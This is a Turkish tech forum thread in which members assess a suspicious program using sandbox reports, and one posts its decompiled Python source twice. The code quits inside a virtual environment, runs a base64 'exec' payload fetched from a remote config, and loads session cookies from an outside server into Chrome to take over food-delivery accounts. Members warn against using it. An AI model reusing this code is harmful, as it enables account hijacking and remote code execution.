VirusTotal Sonucu Yorumlama

skull_crusher · 4 Mart 2023

Dutchman dedi:
False-positive görünüyor. Net analiz gerek.

Rehber: FileScan.io ile Dinamik Analiz Raporu Hazırlama

Selamlar, Şüpheli dosyaların dinamik analizini yapmak son derece önemli, bu sayede statik tespitten zero-day exploit tespitine kadar geniş bir alanda rapor elde edebilirsiniz. Giriş için bağlantıya tıklayın. 100 MB'a kadar olan dosyaları tarayabilirsiniz. Yüklemek için boş alana tıklayıp...

www.technopat.net

Rehber: Hybrid Analysis Raporu Hazırlama

Selamlar, Bu konudaki adımları izleyerek sizden istenen Hybrid Analysis raporunu oluşturabilirsiniz. Rapor alan/almaya çalışan pek çok kişi hazır ayarlar ile rapor aldığı için konudaki opsiyonel seçenekleri rapor isteyen kişinin yönlendirmesi doğrultusunda seçerseniz doğru analiz sonuçlarına...

www.technopat.net

Filescan.IO - Next-Gen Malware Analysis Platform

Submit malware for analysis on this next-gen malware assessment platform. Filescan GmbH develops and licenses technology to fight malware with a focus on Indicator-of-Compromise (IOC) extraction at scale.

www.filescan.io

Yeterli midir bu hocam?

Dutchman · 4 Mart 2023

skull_crusher dedi:
Filescan.IO - Next-Gen Malware Analysis Platform

Submit malware for analysis on this next-gen malware assessment platform. Filescan GmbH develops and licenses technology to fight malware with a focus on Indicator-of-Compromise (IOC) extraction at scale.

www.filescan.io

Yeterli midir bu hocam?

Temiz görünüyor, yine de Hybrid-Analysis raporuna da göz atalım.

Rehber: Hybrid Analysis Raporu Hazırlama

Selamlar, Bu konudaki adımları izleyerek sizden istenen Hybrid Analysis raporunu oluşturabilirsiniz. Rapor alan/almaya çalışan pek çok kişi hazır ayarlar ile rapor aldığı için konudaki opsiyonel seçenekleri rapor isteyen kişinin yönlendirmesi doğrultusunda seçerseniz doğru analiz sonuçlarına...

www.technopat.net

skull_crusher · 4 Mart 2023

Dutchman dedi:
Temiz görünüyor, yine de Hybrid-Analysis raporuna da göz atalım.

Rehber: Hybrid Analysis Raporu Hazırlama

Selamlar, Bu konudaki adımları izleyerek sizden istenen Hybrid Analysis raporunu oluşturabilirsiniz. Rapor alan/almaya çalışan pek çok kişi hazır ayarlar ile rapor aldığı için konudaki opsiyonel seçenekleri rapor isteyen kişinin yönlendirmesi doğrultusunda seçerseniz doğru analiz sonuçlarına...

www.technopat.net

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Buyrun hocam.Opsiyonel seçenekleri de işaretledim.

Bir de rica etsem şu dosyayı da kontrol edebilir misiniz ?

2. Dosya :

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Filescan.IO - Next-Gen Malware Analysis Platform

Submit malware for analysis on this next-gen malware assessment platform. Filescan GmbH develops and licenses technology to fight malware with a focus on Indicator-of-Compromise (IOC) extraction at scale.

www.filescan.io

Not : 2.dosyada windows defender threat bulmadı.

Dutchman · 4 Mart 2023

skull_crusher dedi:
Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Buyrun hocam.Opsiyonel seçenekleri de işaretledim.

Bir de rica etsem şu dosyayı da kontrol edebilir misiniz ?

2. Dosya :

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Filescan.IO - Next-Gen Malware Analysis Platform

Submit malware for analysis on this next-gen malware assessment platform. Filescan GmbH develops and licenses technology to fight malware with a focus on Indicator-of-Compromise (IOC) extraction at scale.

www.filescan.io

Not : 2.dosyada windows defender threat bulmadı.

İlk dosya riskli, gereğinden fazla yere müdahale ediyor. İkinci dosya yüksek riskli, birden çok ağ için istekte bulunuyor ve kullanmaması gereken portları kullanıyor. Uygulamanın amacı nedir? Kullanmanızı tavsiye etmiyorum.

skull_crusher · 4 Mart 2023

Dutchman dedi:
İlk dosya riskli, gereğinden fazla yere müdahale ediyor. İkinci dosya yüksek riskli, birden çok ağ için istekte bulunuyor ve kullanmaması gereken portları kullanıyor. Uygulamanın amacı nedir? Kullanmanızı tavsiye etmiyorum.

Uygulamanın amacı aldığın hesabı sana bilgilerini vermeden Chrome üzerinden otomatik açmak. Bir de mobil uygulaması var daha güvenli olur mu acaba? Dediklerinizden sonra 2. dosyayı da sildim hemen umarım kalıcı hasar olmamıştır sistemde.

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Dutchman · 4 Mart 2023

skull_crusher dedi:
Uygulamanın amacı aldığın hesabı sana bilgilerini vermeden Chrome üzerinden otomatik açmak. Bir de mobil uygulaması var daha güvenli olur mu acaba? Dediklerinizden sonra 2. dosyayı da sildim hemen umarım kalıcı hasar olmamıştır sistemde.

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.

www.hybrid-analysis.com

Çalışma yapısı hakkında bilgim yok fakat pek sağlıklı bir yöntem olduğunu düşünmüyorum. Mobil alanda gizlenmek daha kolay, tehdit görünmemiş fakat bu amaçlarla hareket eden bir uygulama ailesine güvenmezdim şahsen. Tercih sizin.

skull_crusher · 4 Mart 2023

Dutchman dedi:
Çalışma yapısı hakkında bilgim yok fakat pek sağlıklı bir yöntem olduğunu düşünmüyorum. Mobil alanda gizlenmek daha kolay, tehdit görünmemiş fakat bu amaçlarla hareket eden bir uygulama ailesine güvenmezdim şahsen. Tercih sizin.

Tamamdır anladım teşekkür ederim incelemeleriniz için.

Beroski · 4 Mart 2023

Konuya koyduğunuz VirusTotal linkinin analiz sonuçlarına ve dosyanın hareketlerini incelediğimde güvenli gözüküyor ancak konuya sonradan eklediğiniz hybrid analiz sonucuna bakmadım.

Recoo · 4 Mart 2023

Python:

# File: main.pyc (Python 3.10)

import requests
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from datetime import datetime
from datetime import timezone
import urllib.request as urllib
from webdriver_auto_update import check_driver
import os.path as os
from os import path
import time
import ctypes
from selenium.webdriver.chrome.service import Service
import sys
import win32clipboard
import base64

def get_base_prefix_compat():
    if not getattr(sys, 'base_prefix', None) and getattr(sys, 'real_prefix', None):
        pass
    return sys.prefix


def in_virtualenv():
    return get_base_prefix_compat() != sys.prefix

if in_virtualenv() == True:
    sys.exit()
appDataPath = path.expandvars('%LOCALAPPDATA%\\\\webdriver')
chromeDriverPath = appDataPath + '\\chromedriver.exe'
app_url = 'http://sunucu2.hesapye.site/'
getTokenUrlEnd = 'getCookie.php?all=1&token='
responseJsonCookiesKey = 'data'
driver = ''
cookies = ''
scripts = []
sites = []
manifest = []
arguments = [
    '--no-sandbox',
    '--disable-blink-features=AutomationControlled',
    '--disable-infobars',
    '--ignore-certificate-errors',
    '--log-level=3',
    '--lang=en',
    '--ignore-certificate-errors-spki-list',
    '--ignore-ssl-errors',
    '--disable-logging',
    '--disable-in-process-stack-traces',
    '--disable-web-security',
    '--allow-running-insecure-content',
    '--no-default-browser-check',
    '--silent',
    '--disable-extensions',
    '--start-maximized']

def getAppConfig():
    global manifest, sites
    pass
# WARNING: Decompyle incomplete


def clear():
    return os.system('cls')

os.system('@echo off')
clear()
getAppConfig()
ctypes.windll.kernel32.SetConsoleTitleW(manifest['appTitle'])
if len(manifest['exec']) > 0:
    exec(base64.b64decode(manifest['exec']).decode('utf-8'))
if manifest['updateRequired'] == True:
    clear()
    print('! Uygulaman\xc4\xb1n g\xc3\xbcncellenmesi gerekiyor.')
    print('> A\xc5\x9fa\xc4\x9f\xc4\xb1daki linkten yeni s\xc3\xbcr\xc3\xbcm\xc3\xbc indirebilirsiniz.')
    print('> Link: {}'.format(manifest['updateUrl']))
    input()
    continue
print('> Uygulama versiyonu: {}'.format(manifest['version']))
print()
if not path.exists(appDataPath):
    os.mkdir(appDataPath)
check_driver(appDataPath)
ser = Service(chromeDriverPath)

def checkToken(autoCheck = (True,)):
    inp = ''
# WARNING: Decompyle incomplete


def setupBrowser():
    global driver
    print('> Taray\xc4\xb1c\xc4\xb1 ayarlan\xc4\xb1yor...')
    chrome_options = Options()
    for arg in arguments:
        chrome_options.add_argument(arg)
    chrome_options.add_experimental_option('useAutomationExtension', False)
    chrome_options.add_experimental_option('excludeSwitches', [
        'enable-automation',
        'enable-logging'])
    driver = webdriver.Chrome(ser, chrome_options, **('service', 'options'))
    setCookies()


def cookieFilter(ck):
    newCookie = []
    for c in ck:
        thisCookie = { }
        thisCookie['name'] = c['name']
        thisCookie['value'] = c['value']
        if 'domain' in c:
            thisCookie['domain'] = c['domain']
        if 'path' in c:
            thisCookie['path'] = c['path']
        if 'secure' in c:
            thisCookie['secure'] = c['secure']
        if 'httpOnly' in c:
            thisCookie['httpOnly'] = c['httpOnly']
        if 'sameSite' in c:
            if c['sameSite'] == None:
                pass
            elif c['sameSite'].lower() == 'lax':
                thisCookie['sameSite'] = 'Lax'
            elif c['sameSite'].lower() == 'strict':
                thisCookie['sameSite'] = 'Strict'
            elif c['sameSite'].lower() == 'no_restriction':
                thisCookie['sameSite'] = 'None'
        if 'expirationDate' in c:
            thisCookie['expiry'] = int(c['expirationDate'])
        if 'expires' in c:
            isoDate = c['expires'][:-1]
            timestampDate = datetime.fromisoformat(isoDate).timestamp()
            thisCookie['expiry'] = timestampDate
        if 'expiry' in c:
            thisCookie['expiry'] = c['expiry']
        if 'session' in c:
            thisCookie['session'] = c['session']
        newCookie.append(thisCookie)
    return newCookie


def setCookies():
    deviceToken = ''
    print('> Hesap ayarlan\xc4\xb1yor...')
    for script in scripts:
        driver.execute_cdp_cmd('Page.addScriptToEvaluateOnNewDocument', {
            'source': script })
    driver.get('https://www.yemeksepeti.com/')
    for cookie in cookies:
        driver.add_cookie(cookie)
        if cookie['name'] == 'device_token':
            deviceToken = cookie['value']
    clear()
    driver.get('https://www.yemeksepeti.com/')
    ctypes.windll.kernel32.SetConsoleTitleW('Sipari\xc5\x9f verebilirsiniz!')
    print('> Hesap ayarland\xc4\xb1, sipari\xc5\x9f verebilirsiniz.')
    print('> E\xc4\x9fer robot do\xc4\x9frulamas\xc4\xb1 gelirse onaylay\xc4\xb1n ve devam edin.')
# WARNING: Decompyle incomplete

checkToken()

Pyarmor'u deobfus edebildim. Zararlı bir şey yok gibi . Yalnız bu program bir hesabın tokenini çekip size veriyor. Aynı hesap çalıp oradan sipariş vermek gibi, aman dikkat başınız yanmasın.

skull_crusher · 4 Mart 2023

Recoo dedi:

Python:

# File: main.pyc (Python 3.10)

import requests
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from datetime import datetime
from datetime import timezone
import urllib.request as urllib
from webdriver_auto_update import check_driver
import os.path as os
from os import path
import time
import ctypes
from selenium.webdriver.chrome.service import Service
import sys
import win32clipboard
import base64

def get_base_prefix_compat():
 if not getattr(sys, 'base_prefix', None) and getattr(sys, 'real_prefix', None):
 pass
 return sys.prefix

def in_virtualenv():
 return get_base_prefix_compat() != sys.prefix

if in_virtualenv() == True:
 sys.exit()
appDataPath = path.expandvars('%LOCALAPPDATA%\\\\webdriver')
chromeDriverPath = appDataPath + '\\chromedriver.exe'
app_url = 'http://sunucu2.hesapye.site/'
getTokenUrlEnd = 'getCookie.php?all=1&token='
responseJsonCookiesKey = 'data'
driver = ''
cookies = ''
scripts = []
sites = []
manifest = []
arguments = [
 '--no-sandbox',
 '--disable-blink-features=AutomationControlled',
 '--disable-infobars',
 '--ignore-certificate-errors',
 '--log-level=3',
 '--lang=en',
 '--ignore-certificate-errors-spki-list',
 '--ignore-ssl-errors',
 '--disable-logging',
 '--disable-in-process-stack-traces',
 '--disable-web-security',
 '--allow-running-insecure-content',
 '--no-default-browser-check',
 '--silent',
 '--disable-extensions',
 '--start-maximized']

def getAppConfig():
 global manifest, sites
 pass
# WARNING: Decompyle incomplete

def clear():
 return os.system('cls')

os.system('@echo off')
clear()
getAppConfig()
ctypes.windll.kernel32.SetConsoleTitleW(manifest['appTitle'])
if len(manifest['exec']) > 0:
 exec(base64.b64decode(manifest['exec']).decode('utf-8'))
if manifest['updateRequired'] == True:
 clear()
 print('! Uygulaman\xc4\xb1n g\xc3\xbcncellenmesi gerekiyor.')
 print('> A\xc5\x9fa\xc4\x9f\xc4\xb1daki linkten yeni s\xc3\xbcr\xc3\xbcm\xc3\xbc indirebilirsiniz.')
 print('> Link: {}'.format(manifest['updateUrl']))
 input()
 continue
print('> Uygulama versiyonu: {}'.format(manifest['version']))
print()
if not path.exists(appDataPath):
 os.mkdir(appDataPath)
check_driver(appDataPath)
ser = Service(chromeDriverPath)

def checkToken(autoCheck = (True,)):
 inp = ''
# WARNING: Decompyle incomplete

def setupBrowser():
 global driver
 print('> Taray\xc4\xb1c\xc4\xb1 ayarlan\xc4\xb1yor...')
 chrome_options = Options()
 for arg in arguments:
 chrome_options.add_argument(arg)
 chrome_options.add_experimental_option('useAutomationExtension', False)
 chrome_options.add_experimental_option('excludeSwitches', [
 'enable-automation',
 'enable-logging'])
 driver = webdriver.Chrome(ser, chrome_options, **('service', 'options'))
 setCookies()

def cookieFilter(ck):
 newCookie = []
 for c in ck:
 thisCookie = { }
 thisCookie['name'] = c['name']
 thisCookie['value'] = c['value']
 if 'domain' in c:
 thisCookie['domain'] = c['domain']
 if 'path' in c:
 thisCookie['path'] = c['path']
 if 'secure' in c:
 thisCookie['secure'] = c['secure']
 if 'httpOnly' in c:
 thisCookie['httpOnly'] = c['httpOnly']
 if 'sameSite' in c:
 if c['sameSite'] == None:
 pass
 elif c['sameSite'].lower() == 'lax':
 thisCookie['sameSite'] = 'Lax'
 elif c['sameSite'].lower() == 'strict':
 thisCookie['sameSite'] = 'Strict'
 elif c['sameSite'].lower() == 'no_restriction':
 thisCookie['sameSite'] = 'None'
 if 'expirationDate' in c:
 thisCookie['expiry'] = int(c['expirationDate'])
 if 'expires' in c:
 isoDate = c['expires'][:-1]
 timestampDate = datetime.fromisoformat(isoDate).timestamp()
 thisCookie['expiry'] = timestampDate
 if 'expiry' in c:
 thisCookie['expiry'] = c['expiry']
 if 'session' in c:
 thisCookie['session'] = c['session']
 newCookie.append(thisCookie)
 return newCookie

def setCookies():
 deviceToken = ''
 print('> Hesap ayarlan\xc4\xb1yor...')
 for script in scripts:
 driver.execute_cdp_cmd('Page.addScriptToEvaluateOnNewDocument', {
 'source': script })
 driver.get('https://www.yemeksepeti.com/')
 for cookie in cookies:
 driver.add_cookie(cookie)
 if cookie['name'] == 'device_token':
 deviceToken = cookie['value']
 clear()
 driver.get('https://www.yemeksepeti.com/')
 ctypes.windll.kernel32.SetConsoleTitleW('Sipari\xc5\x9f verebilirsiniz!')
 print('> Hesap ayarland\xc4\xb1, sipari\xc5\x9f verebilirsiniz.')
 print('> E\xc4\x9fer robot do\xc4\x9frulamas\xc4\xb1 gelirse onaylay\xc4\xb1n ve devam edin.')
# WARNING: Decompyle incomplete

checkToken()

Pyarmor'u deobfus edebildim. Zararlı bir şey yok gibi . Yalnız bu program bir hesabın tokenini çekip size veriyor. Aynı hesap çalıp oradan sipariş vermek gibi, aman dikkat başınız yanmasın.

Emeğiniz için çok teşekkür ederim hocam. Önerilerinize istinaden kullanmayacağım.

VirusTotal Sonucu Yorumlama

skull_crusher

Kilopat

Rehber: FileScan.io ile Dinamik Analiz Raporu Hazırlama

Rehber: Hybrid Analysis Raporu Hazırlama

Filescan.IO - Next-Gen Malware Analysis Platform

Dutchman

Terapat

Filescan.IO - Next-Gen Malware Analysis Platform

Rehber: Hybrid Analysis Raporu Hazırlama

skull_crusher

Kilopat

Rehber: Hybrid Analysis Raporu Hazırlama

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Filescan.IO - Next-Gen Malware Analysis Platform

Dutchman

Terapat

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Filescan.IO - Next-Gen Malware Analysis Platform

skull_crusher

Kilopat

Free Automated Malware Analysis Service - powered by Falcon Sandbox

Dutchman

Terapat

Free Automated Malware Analysis Service - powered by Falcon Sandbox

skull_crusher

Kilopat

Beroski

Hectopat

Recoo

Kilopat

skull_crusher

Kilopat